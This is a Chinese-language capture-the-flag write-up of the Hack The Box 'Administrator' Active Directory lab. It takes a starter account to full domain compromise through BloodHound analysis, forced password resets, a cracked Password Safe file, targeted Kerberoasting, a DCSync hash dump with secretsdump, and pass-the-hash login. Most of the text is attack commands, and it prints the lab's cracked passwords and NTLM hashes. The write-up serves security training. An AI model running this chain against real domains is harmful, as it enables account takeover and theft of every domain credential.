HTB-Administrator

---

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-22 13:46:45] [INFO] 暴力破解线程数: 1
[2025-03-22 13:46:45] [INFO] 开始信息扫描
[2025-03-22 13:46:45] [INFO] 最终有效主机数量: 1
[2025-03-22 13:46:45] [INFO] 开始主机扫描
[2025-03-22 13:46:45] [INFO] 有效端口数量: 233
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:110
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:21
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:88
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:389
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:139
[2025-03-22 13:46:46] [SUCCESS] 端口开放 administrator.htb:135
[2025-03-22 13:46:46] [SUCCESS] 端口开放 administrator.htb:445
[2025-03-22 13:46:46] [SUCCESS] 服务识别 administrator.htb:21 => [ftp] 产品:Microsoft ftpd 系统:Windows Banner:[220 Microsoft FTP Service.]
[2025-03-22 13:46:48] [SUCCESS] 服务识别 administrator.htb:110 =>
[2025-03-22 13:46:51] [SUCCESS] 服务识别 administrator.htb:139 =>  Banner:[.]
[2025-03-22 13:46:53] [SUCCESS] 服务识别 administrator.htb:445 =>
[2025-03-22 13:46:54] [SUCCESS] 服务识别 administrator.htb:88 =>
[2025-03-22 13:46:57] [SUCCESS] 服务识别 administrator.htb:389 =>
[2025-03-22 13:47:51] [SUCCESS] 服务识别 administrator.htb:135 =>
[2025-03-22 13:47:51] [INFO] 存活端口数量: 7
[2025-03-22 13:47:51] [INFO] 开始漏洞扫描
[2025-03-22 13:47:51] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, pop3, smb, smb2, smbghost, webpoc, webtitle
[2025-03-22 13:47:52] [SUCCESS] NetInfo 扫描结果
目标主机: administrator.htb
主机名: dc
发现的网络接口:
   IPv4地址:
      └─ 10.10.11.42
[2025-03-22 14:09:48] [SUCCESS] 扫描已完成: 11/11

RID枚举

┌──(root㉿kali)-[~]
└─# crackmapexec smb administrator.htb -u "Olivia" -p "ichliebedich" --rid-brute | grep SidTypeUser
SMB                      administrator.htb 445    DC               500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB                      administrator.htb 445    DC               501: ADMINISTRATOR\Guest (SidTypeUser)
SMB                      administrator.htb 445    DC               502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB                      administrator.htb 445    DC               1000: ADMINISTRATOR\DC$ (SidTypeUser)
SMB                      administrator.htb 445    DC               1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB                      administrator.htb 445    DC               1109: ADMINISTRATOR\michael (SidTypeUser)
SMB                      administrator.htb 445    DC               1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB                      administrator.htb 445    DC               1112: ADMINISTRATOR\emily (SidTypeUser)
SMB                      administrator.htb 445    DC               1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB                      administrator.htb 445    DC               3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB                      administrator.htb 445    DC               3602: ADMINISTRATOR\emma (SidTypeUser)

域环境信息搜集

┌──(root㉿kali)-[~]
└─# bloodhound-python -u Olivia -p 'ichliebedich' -c All -d administrator.htb -ns 10.10.11.42
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: unpack requires a buffer of 4 bytes
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 26S        

将dc.administrator.htb添加至hosts

windows可以使用SharpHound结合BloodHound来进行搜集和可视化

.\SharpHound.exe --collectionmethods All --domain administrator.htb --ldapusername Olivia --ldappassword ichliebedich

分析中发现一条线

修改密码

┌──(root㉿kali)-[/tmp]
└─# bloodyAD -u "olivia" -p "ichliebedich" -d "Administrator.htb" --host "10.10.11.42" set password "Michael" "12345678"
[+] Password changed successfully!
                                                                                                                                                                                                 
┌──(root㉿kali)-[/tmp]
└─# bloodyAD -u "Michael" -p "12345678" -d "Administrator.htb" --host "10.10.11.42" set password "Benjamin" "12345678"
[+] Password changed successfully!

是share Moderator组的成员 因此可以尝试ftp登录一下

ftp登录发现一个文件

psafe3是加密的密码安全文件，使用hashcat爆破密码

E:\小工具\HashcatGUI_cn_v1.3.1(密码爆破）\hashcat-6.2.6>hashcat -m 5200 C:\Users\31702\Desktop\Backup.psafe3 rockyou.txt
hashcat (v6.2.6) starting

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.4)
====================
* Device #1: NVIDIA GeForce RTX 4070 Laptop GPU, 7056/8187 MB, 36MCU

OpenCL API (OpenCL 3.0 CUDA 12.4.89) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce RTX 4070 Laptop GPU, skipped

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) RaptorLake-S Mobile Graphics Controller, 12992/26061 MB (2047 MB allocatable), 32MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2947 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14342307
* Bytes.....: 139917362
* Keyspace..: 14342307

C:\Users\31702\Desktop\Backup.psafe3:tekieromucho

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: C:\Users\31702\Desktop\Backup.psafe3
Time.Started.....: Sat Mar 22 15:15:00 2025 (0 secs)
Time.Estimated...: Sat Mar 22 15:15:00 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2129.0 kH/s (7.31ms) @ Accel:16 Loops:256 Thr:256 Vec:1
Speed.#3.........:    37101 H/s (13.31ms) @ Accel:128 Loops:8 Thr:64 Vec:1
Speed.#*.........:  2166.1 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 147456/14342307 (1.03%)
Rejected.........: 0/147456 (0.00%)
Restore.Point....: 0/14342307 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:16-24
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> mckinley1
Candidates.#3....: mckenzy -> kevin1987
Hardware.Mon.#1..: Temp: 47c Util: 33% Core:2490MHz Mem:8100MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Mar 22 15:14:48 2025
Stopped: Sat Mar 22 15:15:02 2025

得到密码

tekieromucho

拿Password Safe解开有三个密码

alexander
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

emily
UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emma
WwANQWnmJnGV07WQN8bMS7FMAbjNur

emily登录得到user.txt

┌──(root㉿kali)-[/tmp]
└─# evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> dir
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir


    Directory: C:\Users\emily\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         3/21/2025   7:43 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\emily\Desktop> 

继续分析刚才收集的信息，emily对用户ethan拥有GenericWrite权限

允许攻击者对目标账户的属性进行修改

Kerberos 协议在处理身份验证时，允许域内用户为拥有 SPN(Service Principal Name，标识服务实例的唯一名称) 的账户请求服务票据。

这些票据通常是由账户的 NTLM 哈希加密生成的，只要域账户注册了SPN，攻击者就可以使用Kerberos请求服务票据并提取票据。因此攻击者可以通过离线破解服务票据(例如使用工具 PowerView 或 GetUserSPNs.py)间接得到目标账户的密码。

来自

域渗透提权：HTB–Administrator_htb administrator-CSDN博客

DCSync – BloodHound

但是这里ethan没有SPN，我们可以通过GenericWrite给他创建一个，然后请求一个票据并使用targetedKerberoast.py破解它

先同步时间 不然会有时差导致破解失败

┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# ntpdig 10.10.11.42                                                                           
2025-03-22 10:29:27.753630 (-0400) +24090.621426 +/- 0.042936 10.10.11.42 s1 no-leap
                                                                                                                                                                                                 
┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# ntpdate -u 10.10.11.42
2025-03-22 10:29:31.940331 (-0400) +24090.621867 +/- 0.041282 10.10.11.42 s1 no-leap
CLOCK: time stepped by 24090.621867
                                                                                                                                                                                                 
┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# python targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$81cb93590ef11dd5470abfccd699f4e7$d8223c8c7ee3020e582d4397a6e340b2691b42bb725a6a79f81f8c20dd134c787cc8021a89c83b306b8a81fe4dd58aca218ac898df8579f75452191ec22cdccc2543a4411068fa58916db34afbe5bafff34e4726584f2e91938e3d2ec2a1f25a836fd5a01f5bc6a4e5220d0b48894c1859d81804b8cd44756aa138d38c126080fe48ed89ed99fe5b6a903c53a9339f9769bd9023d3bf7cf96af5dcdf67a2f6ac8a9aed61fd28c0b527ec76f265ec080da82faa4983c67f02502149a63a6f810dfbfc06237d7ec56300dbacb8dd9f63c8eba45d8be610d1b330ca1b85c10519fa327f3d0eb0400fe3c3b838ec4a79a979b29569d50b63e4e0c9125a603a7c076b835fbe14175cad638d98ac58843bdd0b488c6b163f47b177ea28e04cb632cfff8c99521dbc378679ad18ac40696214d12c85e2419c279ed1e9086af4d5b970592b009a3ab357ff363d804580bbe51f6a166b08f765082d141885f823c34fea87544c73f0d50ad444652da26f833abacf787df56039b84ad59d6e35fb33dfbcbd7fffd6b692e3d800c40e89798d073db78004a50bf87e352bc45caeac2aeacf62e717b598f6a0681cbfe8d6a8b815abdab96ce37f892813e326287db2a88dfbc780161a26c6c857f2b4f865169e6ca96cb4cafa12f432c2c0d912ea57b506d4a8202b09eec848ac9af3f61fe0247c3f3ab298641b1eb224578b621427f5738b7cb433ef90116742053f2613d699b47d28e57928212a8ed59922e9ad7a36326d27a5b1a7623f3d60e8e86b030f2c66cb212a792173bc6bc2adaab4b2f196471ac2096c41737c28926a597298cbda20e9fe93debe2da4d62a451435061854520ca4daa817b807ae182c263eb435dceca15fc10925576a9b767d2a39138e2eae734333377fd2d4f68401f0a5f20da5bac604e197ac8f0768be72b34ce6e5f20436f4fdbe12e7751b4bef4153b6c38147cdd1f99440d34cada6986db7c287d037a61f13a88cae884f62edf708832724591693a20c8d49a7ba13a74de786251ed40dba3cbbe79d9a67b3139079c15477fed6845e49683496e1e2cb2af39c11d19d88eb75c12da05cb22386518e791a4c1b5c79e816051b7f37218426cbffa4f2673a2a8c5b778ada09843b6954d56d3f6c8d9e5d00e28ad7164283fd0f06c3379e15bc5ec98e9cc02ab78a7509392cadeb793a63164a18c09f4cbb2ec58bed9566f1f4a715991f8f6b41eaa12a5d8787dc86dc26face41f48aefb55a53066ab5877757452867380d8ade8257c26d05db5c713c685965921a55caeba13dabc0f38e6f7a6171648f2b92e410fe14e28b071ac86a7d54dcde447156cc412848d794647067b1f88d781e14a0db8235582b950ce927ad57be14f036b9a177850022295685a5e7cb1e821836766db6598fe5fe23ca7f058a91de9110844b9a633e96d38096a73492ae03e762f212499b24164796ce04633958678dfce2ed58dcedf2f7c9b632934639bc566de112943af2d207fbc4b6c07186a6520a8a68c73fe38666356a

得到的是krb5t哈希值

hashcat爆破一下

E:\小工具\HashcatGUI_cn_v1.3.1(密码爆破）\hashcat-6.2.6>hashcat.exe hash.txt rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.4)
====================
* Device #1: NVIDIA GeForce RTX 4070 Laptop GPU, 7056/8187 MB, 36MCU

OpenCL API (OpenCL 3.0 CUDA 12.4.89) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce RTX 4070 Laptop GPU, skipped

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) RaptorLake-S Mobile Graphics Controller, 12992/26061 MB (2047 MB allocatable), 32MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 386 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14342307
* Bytes.....: 139917362
* Keyspace..: 14342307

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$81cb93590ef11dd5470abfccd699f4e7$d8223c8c7ee3020e582d4397a6e340b2691b42bb725a6a79f81f8c20dd134c787cc8021a89c83b306b8a81fe4dd58aca218ac898df8579f75452191ec22cdccc2543a4411068fa58916db34afbe5bafff34e4726584f2e91938e3d2ec2a1f25a836fd5a01f5bc6a4e5220d0b48894c1859d81804b8cd44756aa138d38c126080fe48ed89ed99fe5b6a903c53a9339f9769bd9023d3bf7cf96af5dcdf67a2f6ac8a9aed61fd28c0b527ec76f265ec080da82faa4983c67f02502149a63a6f810dfbfc06237d7ec56300dbacb8dd9f63c8eba45d8be610d1b330ca1b85c10519fa327f3d0eb0400fe3c3b838ec4a79a979b29569d50b63e4e0c9125a603a7c076b835fbe14175cad638d98ac58843bdd0b488c6b163f47b177ea28e04cb632cfff8c99521dbc378679ad18ac40696214d12c85e2419c279ed1e9086af4d5b970592b009a3ab357ff363d804580bbe51f6a166b08f765082d141885f823c34fea87544c73f0d50ad444652da26f833abacf787df56039b84ad59d6e35fb33dfbcbd7fffd6b692e3d800c40e89798d073db78004a50bf87e352bc45caeac2aeacf62e717b598f6a0681cbfe8d6a8b815abdab96ce37f892813e326287db2a88dfbc780161a26c6c857f2b4f865169e6ca96cb4cafa12f432c2c0d912ea57b506d4a8202b09eec848ac9af3f61fe0247c3f3ab298641b1eb224578b621427f5738b7cb433ef90116742053f2613d699b47d28e57928212a8ed59922e9ad7a36326d27a5b1a7623f3d60e8e86b030f2c66cb212a792173bc6bc2adaab4b2f196471ac2096c41737c28926a597298cbda20e9fe93debe2da4d62a451435061854520ca4daa817b807ae182c263eb435dceca15fc10925576a9b767d2a39138e2eae734333377fd2d4f68401f0a5f20da5bac604e197ac8f0768be72b34ce6e5f20436f4fdbe12e7751b4bef4153b6c38147cdd1f99440d34cada6986db7c287d037a61f13a88cae884f62edf708832724591693a20c8d49a7ba13a74de786251ed40dba3cbbe79d9a67b3139079c15477fed6845e49683496e1e2cb2af39c11d19d88eb75c12da05cb22386518e791a4c1b5c79e816051b7f37218426cbffa4f2673a2a8c5b778ada09843b6954d56d3f6c8d9e5d00e28ad7164283fd0f06c3379e15bc5ec98e9cc02ab78a7509392cadeb793a63164a18c09f4cbb2ec58bed9566f1f4a715991f8f6b41eaa12a5d8787dc86dc26face41f48aefb55a53066ab5877757452867380d8ade8257c26d05db5c713c685965921a55caeba13dabc0f38e6f7a6171648f2b92e410fe14e28b071ac86a7d54dcde447156cc412848d794647067b1f88d781e14a0db8235582b950ce927ad57be14f036b9a177850022295685a5e7cb1e821836766db6598fe5fe23ca7f058a91de9110844b9a633e96d38096a73492ae03e762f212499b24164796ce04633958678dfce2ed58dcedf2f7c9b632934639bc566de112943af2d207fbc4b6c07186a6520a8a68c73fe38666356a:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....66356a
Time.Started.....: Sat Mar 22 15:50:11 2025 (0 secs)
Time.Estimated...: Sat Mar 22 15:50:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Speed.#3.........:   643.0 kH/s (11.34ms) @ Accel:32 Loops:1 Thr:8 Vec:1
Speed.#*.........:   643.0 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8192/14342307 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/14342307 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: [Copying]
Candidates.#3....: 123456 -> whitey
Hardware.Mon.#1..: Temp: 45c Util:  1% Core:2175MHz Mem:8100MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Mar 22 15:49:52 2025
Stopped: Sat Mar 22 15:50:12 2025

得到

limpbizkit

接下来就是

现在我们已经获取了 ethan 的密码，使用 BloodHound 检查他的权限。发现 ethan 的 FDOC权限间接赋予了他在域控制器 (Domain Controller, DC) 上的 DCSync权限。

DCSync 是一种滥用 Active Directory (AD) 复制机制的攻击技术。拥有 DCSync 权限的用户可以模拟域控制器，向其他 DC 请求复制敏感数据，如 NTLM 哈希和 Kerberos 密钥。

来自域渗透提权：HTB–Administrator_htb administrator-CSDN博客

借助DCSync，使用impacket-secretsdump转储域控制器上的所有密码

┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# impacket-secretsdump ethan:limpbizkit@administrator.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:519b4c84ffe7a54ef275463aaee05feff17f7ab0a3626777009ca9b071077f7b
administrator.htb\michael:aes128-cts-hmac-sha1-96:cf18258aebf243ab8eab4a6d6caec794
administrator.htb\michael:des-cbc-md5:194f1623cdf11957
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:e110f75337181474608f51a5b22d8198d3fa56d68633b384b7136d4496c89337
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:aa2b24ac2fb879262faa4f6ca294f332
administrator.htb\benjamin:des-cbc-md5:1a4f0bce2343cebf
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 

使用-H 用hash登录

evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

下班